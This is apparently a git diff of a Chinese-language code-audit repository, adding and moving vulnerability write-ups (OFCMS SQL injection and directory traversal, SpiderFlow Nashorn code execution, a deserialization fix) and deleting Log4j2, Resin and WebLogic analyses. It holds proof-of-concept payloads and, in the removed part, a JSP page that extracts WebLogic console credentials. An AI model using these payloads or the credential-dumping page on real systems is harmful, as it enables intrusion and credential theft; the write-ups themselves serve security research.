a/other/jeecms/README.md b/other/jeecms/README.md new file mode 100644 index 00000000..d88c6310 --- /dev/null +++ b/other/jeecms/README.md @@ -0,0 +1,7 @@ +相关漏洞 +--- + +### SSRF + SSTI + Shiro 反序列化 + +- http://www.yulegeyu.com/2019/02/15/Some-vulnerabilities-in-JEECMSV9/ + diff --git a/other/metersphere/README.md b/other/metersphere/README.md new file mode 100644 index 00000000..916fab2b --- /dev/null +++ b/other/metersphere/README.md @@ -0,0 +1,6 @@ +相关漏洞 +--- + +### PluginController Pre-auth RCE + +- https://mp.weixin.qq.com/s/MLZrwHlqjUbF_KMHAxzggw diff --git a/code-audit/01_ofcms/README.md b/other/ofcms/README.md similarity index 74% rename from code-audit/01_ofcms/README.md rename to other/ofcms/README.md index c22b9525..953fdfbb 100644 --- a/code-audit/01_ofcms/README.md +++ b/other/ofcms/README.md @@ -12,11 +12,11 @@ 下载后解压,目录结构如下 -![Untitled](ofcms.assets/Untitled.png) +![Untitled](img/Untitled.png) 右键pom.xml,用IDEA打开,然后等IDEA自动下载好需要的依赖包即可。 -![Untitled](ofcms.assets/Untitled%201.png) +![Untitled](img/Untitled%201.png) 配置数据库 @@ -37,42 +37,42 @@ - 初始化数据库 - ![Untitled](ofcms.assets/Untitled%202.png) + ![Untitled](img/Untitled%202.png) 选择对应版本导入,勾选ofcms数据库 - ![Untitled](ofcms.assets/Untitled%203.png) + ![Untitled](img/Untitled%203.png) 如图,即为导入成功 - ![Untitled](ofcms.assets/Untitled%204.png) + ![Untitled](img/Untitled%204.png) - 修改数据库配置文件 - ![Untitled](ofcms.assets/Untitled%205.png) + ![Untitled](img/Untitled%205.png) 配置中间件-Tomcat - 配置context,选择要部署的war包 - ![Untitled](ofcms.assets/Untitled%207.png) + ![Untitled](img/Untitled%207.png) - 配置端口等设置 - ![Untitled](ofcms.assets/Untitled%208.png) + ![Untitled](img/Untitled%208.png) - Run - ![Untitled](ofcms.assets/Untitled%209.png) + ![Untitled](img/Untitled%209.png) 如图,成功安装 -![Untitled](ofcms.assets/Untitled%2010.png) +![Untitled](img/Untitled%2010.png) (附:可能出现的问题) -![Untitled](ofcms.assets/Untitled%2011.png) +![Untitled](img/Untitled%2011.png) 至此,环境搭建过程结束。 @@ -80,7 +80,7 @@ 了解待审计的系统的介绍以及使用的技术栈 -![Untitled](ofcms.assets/Untitled%2012.png) +![Untitled](img/Untitled%2012.png) 然后根据所用技术栈选择优先挖掘的漏洞类型 @@ -99,36 +99,36 @@ - [https://cve.circl.lu/search](https://cve.circl.lu/search) -![Untitled](ofcms.assets/Untitled%2013.png) +![Untitled](img/Untitled%2013.png) #### CVE-2019-9615 后台 SQL注入 漏洞描述 -![Untitled](ofcms.assets/Untitled%2014.png) +![Untitled](img/Untitled%2014.png) 定位到漏洞点 - com.ofsoft.cms.admin.controller.system.SystemGenerateController#create -![Untitled](ofcms.assets/Untitled%2015.png) +![Untitled](img/Untitled%2015.png) 跟进方法getPara() - com.jfinal.core.Controller#getPara() - 未作任何过滤 -![Untitled](ofcms.assets/Untitled%2016.png) +![Untitled](img/Untitled%2016.png) 跟进方法update,到com.jfinal.plugin.activerecord.DbPro#update()建立数据库连接 -![Untitled](ofcms.assets/Untitled%2017.png) +![Untitled](img/Untitled%2017.png) 跟进方法this.update(); - com.jfinal.plugin.activerecord.DbPro#update() -![Untitled](ofcms.assets/Untitled%2018.png) +![Untitled](img/Untitled%2018.png) 至此处理流程结束,漏洞产生的原因也很清晰: @@ -146,19 +146,19 @@ update of_cms_ad set ad_id = updatexml(1,concat(0x7e,(user())),0) where ad_id = 漏洞效果 -![Untitled](ofcms.assets/Untitled%2019.png) +![Untitled](img/Untitled%2019.png) #### CVE-2019-9610 后台 目录遍历 漏洞描述 -![Untitled](ofcms.assets/Untitled%2020.png) +![Untitled](img/Untitled%2020.png) 定位到漏洞点 - com.ofsoft.cms.admin.controller.cms.TemplateController#getTemplates -![Untitled](ofcms.assets/Untitled%2021.png) +![Untitled](img/Untitled%2021.png) 通过方法getPara()获取参数 @@ -172,29 +172,29 @@ update of_cms_ad set ad_id = updatexml(1,concat(0x7e,(user())),0) where ad_id = - com.ofsoft.cms.admin.controller.system.SystemUtile#getSiteTemplateResourcePath -![Untitled](ofcms.assets/Untitled%2022.png) +![Untitled](img/Untitled%2022.png) 回到之前的地方,通过getPara()获取参数file_name,判断文件是否存在 -![Untitled](ofcms.assets/Untitled%2023.png) +![Untitled](img/Untitled%2023.png) 然后通过FileUtils.readString()读取文件内容 -![Untitled](ofcms.assets/Untitled%2024.png) +![Untitled](img/Untitled%2024.png) 跟进 - com.ofsoft.cms.core.uitle.FileUtils#readString -![Untitled](ofcms.assets/Untitled%2025.png) +![Untitled](img/Untitled%2025.png) 读取文件,并把文件内容写入缓存,设置编码 -![Untitled](ofcms.assets/Untitled%2026.png) +![Untitled](img/Untitled%2026.png) 这里敏感字符进行了替换,并使用setAttr方法保存变量fileContent & editFile。 -![Untitled](ofcms.assets/Untitled%2027.png) +![Untitled](img/Untitled%2027.png) 最后通过render()方法进行渲染并返回给客户端。 @@ -210,5 +210,4 @@ payload 漏洞效果 -![Untitled](ofcms.assets/Untitled%2028-1.png) - +![Untitled](img/Untitled%2028-1.png) diff --git a/code-audit/01_ofcms/ofcms.assets/Untitled 1.png b/other/ofcms/img/Untitled 1.png similarity index 100% rename from code-audit/01_ofcms/ofcms.assets/Untitled 1.png rename to other/ofcms/img/Untitled 1.png diff --git a/code-audit/01_ofcms/ofcms.assets/Untitled 10.png b/other/ofcms/img/Untitled 10.png similarity index 100% rename from code-audit/01_ofcms/ofcms.assets/Untitled 10.png rename to other/ofcms/img/Untitled 10.png diff --git a/code-audit/01_ofcms/ofcms.assets/Untitled 11.png b/other/ofcms/img/Untitled 11.png similarity index 100% rename from code-audit/01_ofcms/ofcms.assets/Untitled 11.png rename to other/ofcms/img/Untitled 11.png diff --git a/code-audit/01_ofcms/ofcms.assets/Untitled 12.png b/other/ofcms/img/Untitled 12.png similarity index 100% rename from code-audit/01_ofcms/ofcms.assets/Untitled 12.png rename to other/ofcms/img/Untitled 12.png diff --git a/code-audit/01_ofcms/ofcms.assets/Untitled 13.png b/other/ofcms/img/Untitled 13.png similarity index 100% rename from code-audit/01_ofcms/ofcms.assets/Untitled 13.png rename to other/ofcms/img/Untitled 13.png diff --git a/code-audit/01_ofcms/ofcms.assets/Untitled 14.png b/other/ofcms/img/Untitled 14.png similarity index 100% rename from code-audit/01_ofcms/ofcms.assets/Untitled 14.png rename to other/ofcms/img/Untitled 14.png diff --git a/code-audit/01_ofcms/ofcms.assets/Untitled 15.png b/other/ofcms/img/Untitled 15.png similarity index 100% rename from code-audit/01_ofcms/ofcms.assets/Untitled 15.png rename to other/ofcms/img/Untitled 15.png diff --git a/code-audit/01_ofcms/ofcms.assets/Untitled 16.png b/other/ofcms/img/Untitled 16.png similarity index 100% rename from code-audit/01_ofcms/ofcms.assets/Untitled 16.png rename to other/ofcms/img/Untitled 16.png diff --git a/code-audit/01_ofcms/ofcms.assets/Untitled 17.png b/other/ofcms/img/Untitled 17.png similarity index 100% rename from code-audit/01_ofcms/ofcms.assets/Untitled 17.png rename to other/ofcms/img/Untitled 17.png diff --git a/code-audit/01_ofcms/ofcms.assets/Untitled 18.png b/other/ofcms/img/Untitled 18.png similarity index 100% rename from code-audit/01_ofcms/ofcms.assets/Untitled 18.png rename to other/ofcms/img/Untitled 18.png diff --git a/code-audit/01_ofcms/ofcms.assets/Untitled 19.png b/other/ofcms/img/Untitled 19.png similarity index 100% rename from code-audit/01_ofcms/ofcms.assets/Untitled 19.png rename to other/ofcms/img/Untitled 19.png diff --git a/code-audit/01_ofcms/ofcms.assets/Untitled 2.png b/other/ofcms/img/Untitled 2.png similarity index 100% rename from code-audit/01_ofcms/ofcms.assets/Untitled 2.png rename to other/ofcms/img/Untitled 2.png diff --git a/code-audit/01_ofcms/ofcms.assets/Untitled 20.png b/other/ofcms/img/Untitled 20.png similarity index 100% rename from code-audit/01_ofcms/ofcms.assets/Untitled 20.png rename to other/ofcms/img/Untitled 20.png diff --git a/code-audit/01_ofcms/ofcms.assets/Untitled 21.png b/other/ofcms/img/Untitled 21.png similarity index 100% rename from code-audit/01_ofcms/ofcms.assets/Untitled 21.png rename to other/ofcms/img/Untitled 21.png diff --git a/code-audit/01_ofcms/ofcms.assets/Untitled 22.png b/other/ofcms/img/Untitled 22.png similarity index 100% rename from code-audit/01_ofcms/ofcms.assets/Untitled 22.png rename to other/ofcms/img/Untitled 22.png diff --git a/code-audit/01_ofcms/ofcms.assets/Untitled 23.png b/other/ofcms/img/Untitled 23.png similarity index 100% rename from code-audit/01_ofcms/ofcms.assets/Untitled 23.png rename to other/ofcms/img/Untitled 23.png diff --git a/code-audit/01_ofcms/ofcms.assets/Untitled 24.png b/other/ofcms/img/Untitled 24.png similarity index 100% rename from code-audit/01_ofcms/ofcms.assets/Untitled 24.png rename to other/ofcms/img/Untitled 24.png diff --git a/code-audit/01_ofcms/ofcms.assets/Untitled 25.png b/other/ofcms/img/Untitled 25.png similarity index 100% rename from code-audit/01_ofcms/ofcms.assets/Untitled 25.png rename to other/ofcms/img/Untitled 25.png diff --git a/code-audit/01_ofcms/ofcms.assets/Untitled 26.png b/other/ofcms/img/Untitled 26.png similarity index 100% rename from code-audit/01_ofcms/ofcms.assets/Untitled 26.png rename to other/ofcms/img/Untitled 26.png diff --git a/code-audit/01_ofcms/ofcms.assets/Untitled 27.png b/other/ofcms/img/Untitled 27.png similarity index 100% rename from code-audit/01_ofcms/ofcms.assets/Untitled 27.png rename to other/ofcms/img/Untitled 27.png diff --git a/code-audit/01_ofcms/ofcms.assets/Untitled 28-1.png b/other/ofcms/img/Untitled 28-1.png similarity index 100% rename from code-audit/01_ofcms/ofcms.assets/Untitled 28-1.png rename to other/ofcms/img/Untitled 28-1.png diff --git a/code-audit/01_ofcms/ofcms.assets/Untitled 3.png b/other/ofcms/img/Untitled 3.png similarity index 100% rename from code-audit/01_ofcms/ofcms.assets/Untitled 3.png rename to other/ofcms/img/Untitled 3.png diff --git a/code-audit/01_ofcms/ofcms.assets/Untitled 4.png b/other/ofcms/img/Untitled 4.png similarity index 100% rename from code-audit/01_ofcms/ofcms.assets/Untitled 4.png rename to other/ofcms/img/Untitled 4.png diff --git a/code-audit/01_ofcms/ofcms.assets/Untitled 5.png b/other/ofcms/img/Untitled 5.png similarity index 100% rename from code-audit/01_ofcms/ofcms.assets/Untitled 5.png rename to other/ofcms/img/Untitled 5.png diff --git a/code-audit/01_ofcms/ofcms.assets/Untitled 7.png b/other/ofcms/img/Untitled 7.png similarity index 100% rename from code-audit/01_ofcms/ofcms.assets/Untitled 7.png rename to other/ofcms/img/Untitled 7.png diff --git a/code-audit/01_ofcms/ofcms.assets/Untitled 8.png b/other/ofcms/img/Untitled 8.png similarity index 100% rename from code-audit/01_ofcms/ofcms.assets/Untitled 8.png rename to other/ofcms/img/Untitled 8.png diff --git a/code-audit/01_ofcms/ofcms.assets/Untitled 9.png b/other/ofcms/img/Untitled 9.png similarity index 100% rename from code-audit/01_ofcms/ofcms.assets/Untitled 9.png rename to other/ofcms/img/Untitled 9.png diff --git a/code-audit/01_ofcms/ofcms.assets/Untitled.png b/other/ofcms/img/Untitled.png similarity index 100% rename from code-audit/01_ofcms/ofcms.assets/Untitled.png rename to other/ofcms/img/Untitled.png diff --git a/other/spider flow/README.md b/other/spider flow/README.md new file mode 100644 index 00000000..3abbcab1 --- /dev/null +++ b/other/spider flow/README.md @@ -0,0 +1,86 @@ +### SpiderFlow RCE via Nashorn + +#### 前置知识 + +— Nashorn是什么?怎么用? + +##### What + +Nashorn是于Java 8中用于取代Rhino(Java 6,Java 7)的JavaScript引擎。 + +##### How + +> 实现如何用Nashorn在Java中执行JS代码即可 + +![image-20220102181550828](img/image-20220102181550828.png) + +测试效果 + +![image-20220102181612329](img/image-20220102181612329.png) + +##### RCE + +Nashorn定义了一个称为Java的新的全局对象,它包含许多有用的函数来使用Java包和类。 + +Java对象的` type()`函数将Java类型导入脚本中。 + +示例 + +![image-20220102182241321](img/image-20220102182241321.png) + +那么如何弹计算器的呢? + +示例 + +```java +package org.spiderflow.demo; + +import javax.script.ScriptEngine; +import javax.script.ScriptEngineManager; +class JsFromJava{ + public static void main(String args[]) throws Exception { + String evilJs="var RCETest= Java.type(\"java.lang\"+\".Runtime\"); var rt = RCETest.getRuntime(); rt.exec(\"calc\");"; + ScriptEngineManager manager = new ScriptEngineManager(null); + ScriptEngine engine = manager.getEngineByName("nashorn"); + engine.eval(evilJs); + } +} +``` + +![image-20220102182630383](img/image-20220102182630383.png) + +#### 审计思路 + +有了上面的测试,审计这类漏洞尝试搜索`.eval(`等关键字即可,然后再看看源码是否实现`jdk.nashorn.api.scripting.ClassFilter`进行了过滤。 + +#### 漏洞复现 + +- 全局搜索`.eval(` + +![image-20220102183719108](img/image-20220102183719108.png) + +- 跟进 + + - org.spiderflow.core.script.ScriptManager#registerFunction + + ![image-20220102184652005](img/image-20220102184652005.png) + + - org.spiderflow.core.script.ScriptManager#concatScript + + ![image-20220102184309834](img/image-20220102184309834.png) + +- 构造payload,闭合一下 + + ```js + # function+functionName+(+parameters+)+{+script+} + functionName: rce + parameters: demo + script: }Java.type("java.lang.Runtime").getRuntime().exec('calc');{ + # function rce(){demo}Java.type("java.lang.Runtime").getRuntime().exec('calc');{} + ``` + + 复现效果: + + ![image-20220102191038717](img/image-20220102191038717.png) + + diff --git a/other/spider flow/img/image-20220102181550828.png b/other/spider flow/img/image-20220102181550828.png new file mode 100644 index 00000000..08f023ff Binary files /dev/null and b/other/spider flow/img/image-20220102181550828.png differ diff --git a/other/spider flow/img/image-20220102181612329.png b/other/spider flow/img/image-20220102181612329.png new file mode 100644 index 00000000..e8cf93d2 Binary files /dev/null and b/other/spider flow/img/image-20220102181612329.png differ diff --git a/other/spider flow/img/image-20220102182241321.png b/other/spider flow/img/image-20220102182241321.png new file mode 100644 index 00000000..6646fe4c Binary files /dev/null and b/other/spider flow/img/image-20220102182241321.png differ diff --git a/other/spider flow/img/image-20220102182630383.png b/other/spider flow/img/image-20220102182630383.png new file mode 100644 index 00000000..89af7359 Binary files /dev/null and b/other/spider flow/img/image-20220102182630383.png differ diff --git a/other/spider flow/img/image-20220102183719108.png b/other/spider flow/img/image-20220102183719108.png new file mode 100644 index 00000000..35c4b728 Binary files /dev/null and b/other/spider flow/img/image-20220102183719108.png differ diff --git a/other/spider flow/img/image-20220102184309834.png b/other/spider flow/img/image-20220102184309834.png new file mode 100644 index 00000000..2710f8bf Binary files /dev/null and b/other/spider flow/img/image-20220102184309834.png differ diff --git a/other/spider flow/img/image-20220102184652005.png b/other/spider flow/img/image-20220102184652005.png new file mode 100644 index 00000000..76ee1928 Binary files /dev/null and b/other/spider flow/img/image-20220102184652005.png differ diff --git a/other/spider flow/img/image-20220102191038717.png b/other/spider flow/img/image-20220102191038717.png new file mode 100644 index 00000000..cfaa4a90 Binary files /dev/null and b/other/spider flow/img/image-20220102191038717.png differ diff --git a/vulnerability-analysis/log4j2/README.md b/vulnerability-analysis/log4j2/README.md deleted file mode 100644 index b3e0435e..00000000 --- a/vulnerability-analysis/log4j2/README.md +++ /dev/null @@ -1,50 +0,0 @@ -**注:** -``` -# 本文仅供安全研究使用 👨‍✈️ -这里想提一嘴,看到很多人在"疯狂"地测dnslog,其实还是希望在没有授权情况下最好不要进行漏洞探测/攻击行为,毕竟"自律是自由的基础"! 👨‍✈️ -``` - -### 漏洞分析 - -根据流传的payload搭建测试环境 - -- log4j_rce.java - -```java -import org.apache.logging.log4j.LogManager; -import org.apache.logging.log4j.Logger; - -public class log4j_rce { - private static final Logger logger = LogManager.getLogger(log4j_rce.class); - public static void main(String[] args) { - logger.error("暂时打码处理"}"); - } -} -``` - -一步一步跟进,最后跟到 -- org.apache.logging.log4j.core.lookup.Interpolator#lookup - -![image](https://user-images.githubusercontent.com/55024146/145439561-9dc12330-6705-4297-aeef-42413a4edc21.png) - -似乎就是这里,测下断点,调试 - -![image](https://user-images.githubusercontent.com/55024146/145439835-a4d042d7-80b9-47ca-a65b-8dcb24ee6bd1.png) - -答案呼之欲出,lookup + jndi! - -其实这里可以触发的不只是error,默认情况下fatal也可以,即便实际的业务场景肯定会有所不同(只会更多)。 - -### 漏洞复现 - -起一个恶意的LDAPRefServer、恶意类Evil - -![image](https://user-images.githubusercontent.com/55024146/145442280-7bfa4038-276e-414b-b0b6-2c1dc6e92e74.png) - -然后触发即可 - -![image](https://user-images.githubusercontent.com/55024146/145458787-4acd92c0-50db-40dc-b4cb-6d49014e53ac.png) - - - - diff --git a/vulnerability-analysis/resin/README.md b/vulnerability-analysis/resin/README.md deleted file mode 100644 index 1a66c7bd..00000000 --- a/vulnerability-analysis/resin/README.md +++ /dev/null @@ -1,155 +0,0 @@ -**目录** -- 0x01-支持.jspf后缀 -- 0x02-类IIS6.0的解析漏洞 -- 0x03-Resin 4.0.36 信息泄露漏洞(ZSL-2013-5144) - - -### 0x01-支持.jspf后缀 -配置文件 - -> E:\Resin\resin-4.0.65\conf\app-default.xml - -![image](https://user-images.githubusercontent.com/55024146/144174160-82c02d3b-a775-4b71-acaf-d9f03f2b3653.png) - -可见Resin不仅支持.jsp、.jspx,也支持.jspf。 - -```jsp -<% - response.getWriter().write("Hello Resin !!!"); -%> -``` -![image](https://user-images.githubusercontent.com/55024146/144174179-d1e5af4c-c1cc-4f41-a5da-7fa2eb977b66.png) - -### 0x02-类IIS6.0的解析漏洞 - -先看测试效果图 - -![image](https://user-images.githubusercontent.com/55024146/144174242-db437f8b-0feb-4683-8e46-7e7586905a15.png) - -希望传达的意思 - -- 若文件夹名为`xxx.jsp`,其中放置的任意后缀的文件都将被当作JSP文件解析。 - -#### 1、为什么会这样? - -分三步跟一下http请求的处理过程,来到关键函数下个断点 - -- com.caucho.server.dispatch.UrlMap#map - -**第1步:jsp文件** - -![image](https://user-images.githubusercontent.com/55024146/144174286-61ce59f9-da8f-47da-bb5a-60c65de85aab.png) - -![image](https://user-images.githubusercontent.com/55024146/144174296-2f6a4527-c1bb-4199-b5b9-d108216991bc.png) - -正常进入jsp的解析逻辑 - -![image](https://user-images.githubusercontent.com/55024146/144174317-03477b55-7f9c-4550-9e06-cb21fb4cd300.png) - -**第2步:非jsp文件** - -![image](https://user-images.githubusercontent.com/55024146/144174351-15c3b0f6-df52-4c02-9322-bb0f76a3b2bf.png) - -![image](https://user-images.githubusercontent.com/55024146/144174357-ba30fda0-d499-4929-8234-f0778f09039b.png) - -进入resin-file的处理逻辑 - -![image](https://user-images.githubusercontent.com/55024146/144174378-bf20140b-fedf-4507-bef2-445187820ab2.png) - -处理结果 - -![image](https://user-images.githubusercontent.com/55024146/144174406-2259125d-b101-4073-94d5-01b8f9d67d96.png) - -**第3步:x.jsp文件夹 + 非.jsp文件** - -![image](https://user-images.githubusercontent.com/55024146/144174432-3c2e4d49-7cc2-48ae-928e-60c9af933411.png) - -![image](https://user-images.githubusercontent.com/55024146/144174451-3cd87542-0dad-41de-ad7f-48a9359d8ef2.png) - -![image](https://user-images.githubusercontent.com/55024146/144174460-5f803d3c-8b6f-42e6-9f81-4def07970343.png) - -也进入resin-file的处理逻辑 - -![image](https://user-images.githubusercontent.com/55024146/144174477-b242ffb6-6d62-442c-98a7-ea6a7cb11206.png) - -#### 2、造成这种处理差异的原理是什么? - -![image](https://user-images.githubusercontent.com/55024146/144174511-0cdabaf9-33c1-4c6e-aca5-c27c4ade0801.png) - -map方法将会对url路径进行正则表达式,然后根据匹配结果进入不同的处理逻辑 - -> /hello.jsp - -![image](https://user-images.githubusercontent.com/55024146/144174547-64dc2dba-d06b-4591-8f01-3ad408648d96.png) - -> /hello.hello - -![image](https://user-images.githubusercontent.com/55024146/144174573-43a536d0-d35f-40e2-8ecd-0b79f1d66723.png) - -> /x.jsp/hello.hello - -![image](https://user-images.githubusercontent.com/55024146/144174584-858aca20-2946-4f46-808d-7da2c1b733ad.png) - - -### 0x03 Resin 4.0.36 信息泄露漏洞(ZSL-2013-5144) - -- https://www.zeroscience.mk/en/vulnerabilities/ZSL-2013-5144.php - -测试效果 -> 读取index.jsp - -![image](https://user-images.githubusercontent.com/55024146/144178194-d2717d65-d9ed-4f3c-8903-4f4a624d848f.png) - -> 读取resin-admin.xml - -![image](https://user-images.githubusercontent.com/55024146/144181449-d6b81379-429e-49a0-b02a-72c5c860b6d2.png) - - -#### 漏洞分析 - -从上面的分析中知道了可以从com.caucho.server.dispatch.UrlMap观察resin对http请求的处理逻辑,下断点调试 - -![image](https://user-images.githubusercontent.com/55024146/144178592-1ee0f23f-5b67-4cd7-8dc4-a0437cb67168.png) - -一路跟到`ServletMapping` - -![image](https://user-images.githubusercontent.com/55024146/144178671-718bf816-6494-4676-a40f-3b46d9f10c74.png) - -很明显,到这里应该就知道漏洞成因估计是该版本的resin-web.xml默认添加了路由为/viewfile/*的servlet - -文件位置 -> E:\Resin\resin-pro-4.0.36\doc\resin-doc\WEB-INF\resin-web.xml - -![image](https://user-images.githubusercontent.com/55024146/144179072-662fff09-1c54-4ee2-a25b-923a542aaf40.png) - -跟进对应的类 -- com.caucho.doc.ViewFileServlet - -![image](https://user-images.githubusercontent.com/55024146/144179200-719d6a33-731d-402d-9907-cc15ea2ca4bf.png) - - -继续断点 - -![image](https://user-images.githubusercontent.com/55024146/144179705-96c69246-482e-43d3-8d96-b3181bc2c07c.png) - -然后通过viewFile打印文件内容 - -![image](https://user-images.githubusercontent.com/55024146/144183728-c145ad4b-eca7-4ee1-866c-e6c039910117.png) - - -![image](https://user-images.githubusercontent.com/55024146/144183814-9994ff06-4e7a-458b-92c1-c881e1834c82.png) - - - - - - - - - - - - - - - diff --git a/vulnerability-analysis/weblogic/README.md b/vulnerability-analysis/weblogic/README.md deleted file mode 100644 index 648e4628..00000000 --- a/vulnerability-analysis/weblogic/README.md +++ /dev/null @@ -1,56 +0,0 @@ -目录 -- 01 获取Weblogic console用户名&密码(免解密)-getPass.jsp - - -### 获取Weblogic console用户名&密码(免解密)-getPass.jsp - -以往遇上weblogic的站点时都是通过密钥进行解密获取console的密码,甚至但是解密方法就出现好几种, - -![image](https://user-images.githubusercontent.com/55024146/144720808-7e3efafd-8126-4994-bd78-945e314ff3ac.png) - -但是前几个小时在twitter @jas502n师傅公开了[Use T3 protocol Get weblogic console username, password](https://twitter.com/jas502n/status/1467122190760177664)这个姿势,于是赶紧学习学习!!! - - -断点看看代码细节: - -![image](https://user-images.githubusercontent.com/55024146/144720899-5b80c842-e6dd-47c2-b2fc-e3c60ba2a8f5.png) - -代码实现 - -> ```jsp -> <%@page import="java.lang.reflect.Field" %> -> <%@page import="java.lang.reflect.Method" %> -> -> <% -> /** -> * 已测试: -> * 10.3.6.0 -> */ -> try{ -> ClassLoader classLoader = Thread.currentThread().getContextClassLoader(); -> Class httpDataTransferHandler = classLoader.loadClass("weblogic.deploy.service.datatransferhandlers.HttpDataTransferHandler"); -> Class managementService = classLoader.loadClass("weblogic.management.provider.ManagementService"); -> Class authenticatedSubject = classLoader.loadClass("weblogic.security.acl.internal.AuthenticatedSubject"); -> Class propertyService = classLoader.loadClass("weblogic.management.provider.PropertyService"); -> Field KERNE_ID = httpDataTransferHandler.getDeclaredField("KERNE_ID"); -> KERNE_ID.setAccessible(true); -> Method getPropertyService = managementService.getMethod("getPropertyService",authenticatedSubject); -> getPropertyService.setAccessible(true); -> Object prop = getPropertyService.invoke((Object) null,KERNE_ID.get((Object) null)); -> Method getTimestamp1 = propertyService.getMethod("getTimestamp1"); -> getTimestamp1.setAccessible(true); -> Method getTimestamp2 = propertyService.getMethod("getTimestamp2"); -> getTimestamp2.setAccessible(true); -> String username = (String) getTimestamp1.invoke(prop); -> String password = (String) getTimestamp2.invoke(prop); -> response.getWriter().write( username + "/" + password); -> }catch (Exception e) { -> e.printStackTrace(); -> } -> %> -> ``` - -测试效果 - -![image](https://user-images.githubusercontent.com/55024146/144720974-59cb9fd5-65df-4dae-a9f8-fd103719f499.png) - diff --git a/vulnerability-analysis/weblogic/getPass.jsp b/vulnerability-analysis/weblogic/getPass.jsp deleted file mode 100644 index 591193bf..00000000 --- a/vulnerability-analysis/weblogic/getPass.jsp +++ /dev/null @@ -1,30 +0,0 @@ -<%@page import="java.lang.reflect.Field" %> -<%@page import="java.lang.reflect.Method" %> - -<% - /** - * 已测试: - * 10.3.6.0 - */ - try{ - ClassLoader classLoader = Thread.currentThread().getContextClassLoader(); - Class httpDataTransferHandler = classLoader.loadClass("weblogic.deploy.service.datatransferhandlers.HttpDataTransferHandler"); - Class managementService = classLoader.loadClass("weblogic.management.provider.ManagementService"); - Class authenticatedSubject = classLoader.loadClass("weblogic.security.acl.internal.AuthenticatedSubject"); - Class propertyService = classLoader.loadClass("weblogic.management.provider.PropertyService"); - Field KERNE_ID = httpDataTransferHandler.getDeclaredField("KERNE_ID"); - KERNE_ID.setAccessible(true); - Method getPropertyService = managementService.getMethod("getPropertyService",authenticatedSubject); - getPropertyService.setAccessible(true); - Object prop = getPropertyService.invoke((Object) null,KERNE_ID.get((Object) null)); - Method getTimestamp1 = propertyService.getMethod("getTimestamp1"); - getTimestamp1.setAccessible(true); - Method getTimestamp2 = propertyService.getMethod("getTimestamp2"); - getTimestamp2.setAccessible(true); - String username = (String) getTimestamp1.invoke(prop); - String password = (String) getTimestamp2.invoke(prop); - response.getWriter().write( username + "/" + password); - }catch (Exception e) { - e.printStackTrace(); - } -%> \ No newline at end of file diff --git "a/344円277円256円345円244円215円346円226円271円346円241円210円/README.md" "b/344円277円256円345円244円215円346円226円271円346円241円210円/README.md" new file mode 100644 index 00000000..0b024f36 --- /dev/null +++ "b/344円277円256円345円244円215円346円226円271円346円241円210円/README.md" @@ -0,0 +1 @@ +> 记录漏洞复现过程中遇到的各种漏洞的修复方案 diff --git "a/344円277円256円345円244円215円346円226円271円346円241円210円/345円217円215円345円272円217円345円210円227円345円214円226円/readObject.md" "b/344円277円256円345円244円215円346円226円271円346円241円210円/345円217円215円345円272円217円345円210円227円345円214円226円/readObject.md" new file mode 100644 index 00000000..58602bab --- /dev/null +++ "b/344円277円256円345円244円215円346円226円271円346円241円210円/345円217円215円345円272円217円345円210円227円345円214円226円/readObject.md" @@ -0,0 +1,50 @@ + +### 01 ValidatingObjectInputStream(commons-io.jar) + +commons-io.jar 的 ValidatingObjectInputStream 类提供了 accept/reject 方法来控制允许反序列化/不允许反序列化的类, 以达到黑/白名单的效果。 + + +案例: GoAnywhere MFT (CVE-2023-0669) + +修复前 +```java +private static byte[] verify(byte[] paramArrayOfByte, KeyConfig paramKeyConfig) throws IOException, ClassNotFoundException, NoSuchAlgorithmException, InvalidKeyException, SignatureException, UnrecoverableKeyException, CertificateException, KeyStoreException { + objectInputStream = null; + try { + String str = "SHA1withDSA"; + if ("2".equals(paramKeyConfig.getVersion())) { + str = "SHA512withRSA"; + } + PublicKey publicKey = getPublicKey(paramKeyConfig); + objectInputStream = new ObjectInputStream(new ByteArrayInputStream(paramArrayOfByte)); + SignedObject signedObject = (SignedObject)objectInputStream.readObject(); +``` + +修复后 +```java +private static byte[] verify(byte[] var0, KeyConfig var1) throws IOException, ClassNotFoundException, NoSuchAlgorithmException, InvalidKeyException, SignatureException, UnrecoverableKeyException, CertificateException, KeyStoreException { + // 只允许反序列化的类为 SignedObject、[B + ObjectInputStream var2 = getSecureObjectInputStream(var0, SignedObject.class, byte[].class); + + byte[] var9; + try { + String var3 = "SHA1withDSA"; + if ("2".equals(var1.getVersion())) { + var3 = "SHA512withRSA"; + } + + PublicKey var4 = getPublicKey(var1); + SignedObject var5 = (SignedObject)var2.readObject(); +``` + +修复方案 + +```java + private static ObjectInputStream getSecureObjectInputStream(byte[] var0, Class... var1) throws IOException { + ValidatingObjectInputStream var2 = new ValidatingObjectInputStream(new ByteArrayInputStream(var0)); + var2.accept(var1); + return var2; + } +``` + +通过 ValidatingObjectInputStream 设置白名单,只允许反序列化的类为 `SignedObject` 和 `[B`,SignedObject虽然重写了 readObect(), 但是没发现有啥可以进一步绕过的地方。

AltStyle によって変換されたページ (->オリジナル) /